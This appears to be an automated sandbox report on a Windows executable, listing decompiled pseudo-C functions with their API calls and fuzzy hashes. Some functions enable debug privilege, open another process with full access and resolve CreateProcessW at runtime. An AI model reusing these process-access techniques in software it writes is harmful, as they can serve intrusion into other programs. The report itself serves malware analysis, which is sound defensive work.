                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcProcessTimes
                                                                                      • String ID: GetProcessTimes$kernel32.dll
                                                                                      • API String ID: 1714573020-3385500049
                                                                                      • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                      • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                      • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                      				struct HRSRC__* _t12;
                                                                                      				void* _t16;
                                                                                      				void* _t17;
                                                                                      				signed int _t18;
                                                                                      				signed int _t26;
                                                                                      				signed int _t29;
                                                                                      				signed int _t33;
                                                                                      				struct HRSRC__* _t35;
                                                                                      				signed int _t36;
                                                                                      
                                                                                      				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                      				_t35 = _t12;
                                                                                      				if(_t35 != 0) {
                                                                                      					_t33 = SizeofResource(_a4, _t35);
                                                                                      					if(_t33 > 0) {
                                                                                      						_t16 = LoadResource(_a4, _t35);
                                                                                      						if(_t16 != 0) {
                                                                                      							_t17 = LockResource(_t16);
                                                                                      							if(_t17 != 0) {
                                                                                      								_a4 = _t33;
                                                                                      								_t29 = _t33 * _t33;
                                                                                      								_t36 = 0;
                                                                                      								_t7 =  &_a4;
                                                                                      								 *_t7 = _a4 >> 2;
                                                                                      								if( *_t7 != 0) {
                                                                                      									do {
                                                                                      										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                      										_t36 = _t36 + 1;
                                                                                      										_t29 = _t26;
                                                                                      									} while (_t36 < _a4);
                                                                                      								}
                                                                                      								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                      								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}













                                                                                      APIs
                                                                                      • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                      • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 3473537107-0
                                                                                      • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                      • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                      • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                      				void* _t8;
                                                                                      				void* _t13;
                                                                                      				signed int _t16;
                                                                                      				void** _t21;
                                                                                      				signed int _t22;
                                                                                      
                                                                                      				_t21 = __edi;
                                                                                      				_t22 =  *__eax;
                                                                                      				if(__edx < _t22) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					_t13 =  *__edi;
                                                                                      					do {
                                                                                      						_t1 =  &_a8; // 0x4057e1
                                                                                      						 *__eax =  *__eax +  *_t1;
                                                                                      						_t16 =  *__eax;
                                                                                      					} while (__edx >= _t16);
                                                                                      					_t8 = malloc(_t16 * _a4); // executed
                                                                                      					 *__edi = _t8;
                                                                                      					if(_t22 > 0) {
                                                                                      						if(_t8 != 0) {
                                                                                      							memcpy(_t8, _t13, _t22 * _a4);
                                                                                      						}
                                                                                      						free(_t13); // executed
                                                                                      					}
                                                                                      					return 0 |  *_t21 != 0x00000000;
                                                                                      				}
                                                                                      			}


                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 0040496D
                                                                                      • memcpy.MSVCRT ref: 00404985
                                                                                      • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: freemallocmemcpy
                                                                                      • String ID: W@
                                                                                      • API String ID: 3056473165-1729568415
                                                                                      • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                      • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                      • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405436(wchar_t* _a4) {
                                                                                      				void _v2050;
                                                                                      				signed short _v2052;
                                                                                      				void* __esi;
                                                                                      				struct HINSTANCE__* _t16;
                                                                                      				WCHAR* _t18;
                                                                                      
                                                                                      				_v2052 = _v2052 & 0x00000000;
                                                                                      				memset( &_v2050, 0, 0x7fe);
                                                                                      				E00404C3C( &_v2052);
                                                                                      				_t18 =  &_v2052;
                                                                                      				E004047AF(_t18);
                                                                                      				wcscat(_t18, _a4);
                                                                                      				_t16 = LoadLibraryW(_t18); // executed
                                                                                      				if(_t16 == 0) {
                                                                                      					return LoadLibraryW(_a4);
                                                                                      				}
                                                                                      				return _t16;
                                                                                      			}


                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                        • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                        • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                      • wcscat.MSVCRT ref: 00405478
                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 3725422290-0
                                                                                      • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                      • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                      • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed short* _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				intOrPtr _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int _v48;
                                                                                      				char _v52;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed short* _t68;
                                                                                      				signed short _t72;
                                                                                      				intOrPtr _t80;
                                                                                      				void* _t82;
                                                                                      				void* _t85;
                                                                                      				intOrPtr _t90;
                                                                                      				signed int _t101;
                                                                                      				intOrPtr _t102;
                                                                                      				void** _t104;
                                                                                      				signed short* _t106;
                                                                                      				signed int* _t107;
                                                                                      				signed int _t110;
                                                                                      
                                                                                      				_t94 = __ecx;
                                                                                      				_t101 = 0;
                                                                                      				_v32 = 0x22;
                                                                                      				_v16 = 0;
                                                                                      				_v20 = 0;
                                                                                      				_v12 = 0;
                                                                                      				_v24 = 1;
                                                                                      				_v8 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_v40 = 0x100;
                                                                                      				_v52 = 0;
                                                                                      				_t68 = E004054B9(_a4);
                                                                                      				_t106 = _a8;
                                                                                      				if( *_t106 == 0) {
                                                                                      					L31:
                                                                                      					_t107 = _a4;
                                                                                      					L32:
                                                                                      					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
                                                                                      					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
                                                                                      					E004055D1(_t68,  &_v52);
                                                                                      					return _t102;
                                                                                      				}
                                                                                      				_v28 = _t106;
                                                                                      				do {
                                                                                      					_t72 =  *_v28 & 0x0000ffff;
                                                                                      					if(_t72 != 0x20 || _v8 != 0) {
                                                                                      						if(_t72 == 0x22 || _t72 == 0x27) {
                                                                                      							if(_v8 != 0) {
                                                                                      								if(_t72 != _v32) {
                                                                                      									goto L14;
                                                                                      								}
                                                                                      								_v8 = _v8 ^ 0x00000001;
                                                                                      								goto L25;
                                                                                      							}
                                                                                      							_v32 = _t72 & 0x0000ffff;
                                                                                      							_v8 = 1;
                                                                                      							goto L25;
                                                                                      						} else {
                                                                                      							L14:
                                                                                      							if(_t101 != 0) {
                                                                                      								L24:
                                                                                      								E0040559A( &_v52, _t101);
                                                                                      								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
                                                                                      								_t106 = _a8;
                                                                                      								_t101 = _t101 + 1;
                                                                                      								_v12 = _t101;
                                                                                      								L25:
                                                                                      								_v24 = 0;
                                                                                      								goto L26;
                                                                                      							}
                                                                                      							if(_t72 == 0x20) {
                                                                                      								goto L25;
                                                                                      							}
                                                                                      							_t104 = _a4 + 0x20;
                                                                                      							if(_v16 >= 0) {
                                                                                      								_t110 = _v16;
                                                                                      								_t82 = _t104[2];
                                                                                      								if(_t110 != 0xffffffff) {
                                                                                      									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
                                                                                      								} else {
                                                                                      									free( *_t104);
                                                                                      								}
                                                                                      								_t85 = _t110 + 1;
                                                                                      								if(_t104[3] < _t85) {
                                                                                      									_t104[3] = _t85;
                                                                                      								}
                                                                                      								_t94 = _v20;
                                                                                      								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
                                                                                      							}
                                                                                      							_t101 = _v12;
                                                                                      							goto L24;
                                                                                      						}
                                                                                      					} else {
                                                                                      						if(_v24 == 0) {
                                                                                      							E0040559A( &_v52, _t101);
                                                                                      							_t90 = _v36;
                                                                                      							 *((short*)(_t90 + _t101 * 2)) = 0;
                                                                                      							if(_t90 == 0) {
                                                                                      								_t90 = 0x40c4e8;
                                                                                      							}
                                                                                      							E004054DF(_a4, _t94, _t90); // executed
                                                                                      							_v16 = _v16 + 1;
                                                                                      							_v24 = 1;
                                                                                      							_v12 = 0;
                                                                                      							_t101 = 0;
                                                                                      						}
                                                                                      					}
                                                                                      					L26:
                                                                                      					_v20 = _v20 + 1;
                                                                                      					_t68 = _t106 + _v20 * 2;
                                                                                      					_v28 = _t68;
                                                                                      				} while ( *_t68 != 0);
                                                                                      				if(_t101 <= 0) {
                                                                                      					goto L31;
                                                                                      				}
                                                                                      				E0040559A( &_v52, _t101);
                                                                                      				_t80 = _v36;
                                                                                      				 *((short*)(_t80 + _t101 * 2)) = 0;
                                                                                      				if(_t80 == 0) {
                                                                                      					_t80 = 0x40c4e8;
                                                                                      				}
                                                                                      				_t107 = _a4;
                                                                                      				_t68 = E004054DF(_t107, _t94, _t80);
                                                                                      				goto L32;
                                                                                      			}


                                                                                      APIs
                                                                                        • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                        • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID: "
                                                                                      • API String ID: 1294909896-123907689
                                                                                      • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                      • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                      • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                      • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004054B9(intOrPtr* __esi) {
                                                                                      
                                                                                      				free( *(__esi + 0x10));
                                                                                      				free( *(__esi + 0xc)); // executed
                                                                                      				 *((intOrPtr*)(__esi)) = 0;
                                                                                      				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                      				 *(__esi + 0xc) = 0;
                                                                                      				 *(__esi + 0x10) = 0;
                                                                                      				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                      				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                      				return 0;
                                                                                      			}




                                                                                      APIs
                                                                                      • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                      • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                      • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                      • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                      • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                      				signed int _v8;
                                                                                      				void* _t8;
                                                                                      				void* _t13;
                                                                                      
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                      				_t13 = _t8;
                                                                                      				if(_v8 != 0) {
                                                                                      					FreeLibrary(_v8);
                                                                                      				}
                                                                                      				return _t13;
                                                                                      			}







                                                                                      APIs
                                                                                        • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                        • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                      • String ID:
                                                                                      • API String ID: 187924719-0
                                                                                      • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                      • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                      • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				struct HINSTANCE__** _t10;
                                                                                      
                                                                                      				_t10 = __eax;
                                                                                      				E00409921(__eax);
                                                                                      				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                      				if(_t6 == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                      				return _t8;
                                                                                      			}








                                                                                      APIs
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                        • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$FileModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3859505661-0
                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                      • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004095DA(signed int* __edi) {
                                                                                      				void* __esi;
                                                                                      				struct HINSTANCE__* _t3;
                                                                                      				signed int* _t7;
                                                                                      
                                                                                      				_t7 = __edi;
                                                                                      				_t3 =  *__edi;
                                                                                      				if(_t3 != 0) {
                                                                                      					FreeLibrary(_t3); // executed
                                                                                      					 *__edi =  *__edi & 0x00000000;
                                                                                      				}
                                                                                      				E004099D4( &(_t7[0xa]));
                                                                                      				return E004099D4( &(_t7[6]));
                                                                                      			}







                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 3664257935-0
                                                                                      • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                      • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                      • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                      
                                                                                      				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                                      				return 1;
                                                                                      			}




                                                                                      APIs
                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: EnumNamesResource
                                                                                      • String ID:
                                                                                      • API String ID: 3334572018-0
                                                                                      • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                      • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                      • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004055D1(void* __eax, signed int* __esi) {
                                                                                      				void* _t7;
                                                                                      				signed int* _t9;
                                                                                      
                                                                                      				_t9 = __esi;
                                                                                      				_t7 = __eax;
                                                                                      				if(__esi[4] != 0) {
                                                                                      					free(__esi[4]); // executed
                                                                                      					__esi[4] = __esi[4] & 0x00000000;
                                                                                      				}
                                                                                      				_t9[2] = _t9[2] & 0x00000000;
                                                                                      				 *_t9 =  *_t9 & 0x00000000;
                                                                                      				return _t7;
                                                                                      			}






                                                                                      APIs
                                                                                      • free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: free
                                                                                      • String ID:
                                                                                      • API String ID: 1294909896-0
                                                                                      • Opcode ID: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                      • Instruction ID: d9e56b4edb5911b8eb4629cf82416adf3d5ef3fa420fba14bebf6bcebba5d7e5
                                                                                      • Opcode Fuzzy Hash: 1ccf70efd53a905eaa3be4641a335161fb9261ddf056e2ce29b449610dd832be
                                                                                      • Instruction Fuzzy Hash: FEC00272420B01DBE7355F21D8093A6B3F1FB1032BFA04E6E90A6148E1C7BCA58CCA48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      C-Code - Quality: 70%
                                                                                      			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
                                                                                      				char _v8;
                                                                                      				long _v12;
                                                                                      				long _v16;
                                                                                      				long _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				long _v28;
                                                                                      				char _v564;
                                                                                      				char _v16950;
                                                                                      				char _v33336;
                                                                                      				_Unknown_base(*)()* _v33348;
                                                                                      				_Unknown_base(*)()* _v33352;
                                                                                      				void _v33420;
                                                                                      				void _v33432;
                                                                                      				void _v33436;
                                                                                      				intOrPtr _v66756;
                                                                                      				intOrPtr _v66760;
                                                                                      				void _v66848;
                                                                                      				void _v66852;
                                                                                      				void* __edi;
                                                                                      				void* _t76;
                                                                                      				_Unknown_base(*)()* _t84;
                                                                                      				_Unknown_base(*)()* _t87;
                                                                                      				void* _t90;
                                                                                      				signed int _t126;
                                                                                      				struct HINSTANCE__* _t128;
                                                                                      				intOrPtr* _t138;
                                                                                      				void* _t140;
                                                                                      				void* _t144;
                                                                                      				void* _t147;
                                                                                      				void* _t148;
                                                                                      
                                                                                      				E0040B550(0x10524, __ecx);
                                                                                      				_t138 = _a4;
                                                                                      				_v12 = 0;
                                                                                      				 *_t138 = 0;
                                                                                      				_t76 = OpenProcess(0x1f0fff, 0, _a8);
                                                                                      				_a8 = _t76;
                                                                                      				if(_t76 == 0) {
                                                                                      					 *_t138 = GetLastError();
                                                                                      					L30:
                                                                                      					return _v12;
                                                                                      				}
                                                                                      				_v33436 = 0;
                                                                                      				memset( &_v33432, 0, 0x8284);
                                                                                      				_t148 = _t147 + 0xc;
                                                                                      				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                                      				_v8 = 0;
                                                                                      				E00409C70( &_v8);
                                                                                      				_push("CreateProcessW");
                                                                                      				_push(_t128);
                                                                                      				if(_v8 == 0) {
                                                                                      					_t84 = GetProcAddress();
                                                                                      				} else {
                                                                                      					_t84 = _v8();
                                                                                      				}
                                                                                      				_v33352 = _t84;
                                                                                      				E00409C70( &_v8);
                                                                                      				_push("GetLastError");
                                                                                      				_push(_t128);
                                                                                      				if(_v8 == 0) {
                                                                                      					_t87 = GetProcAddress();
                                                                                      				} else {
                                                                                      					_t87 = _v8();
                                                                                      				}
                                                                                      				_t140 = _a28;
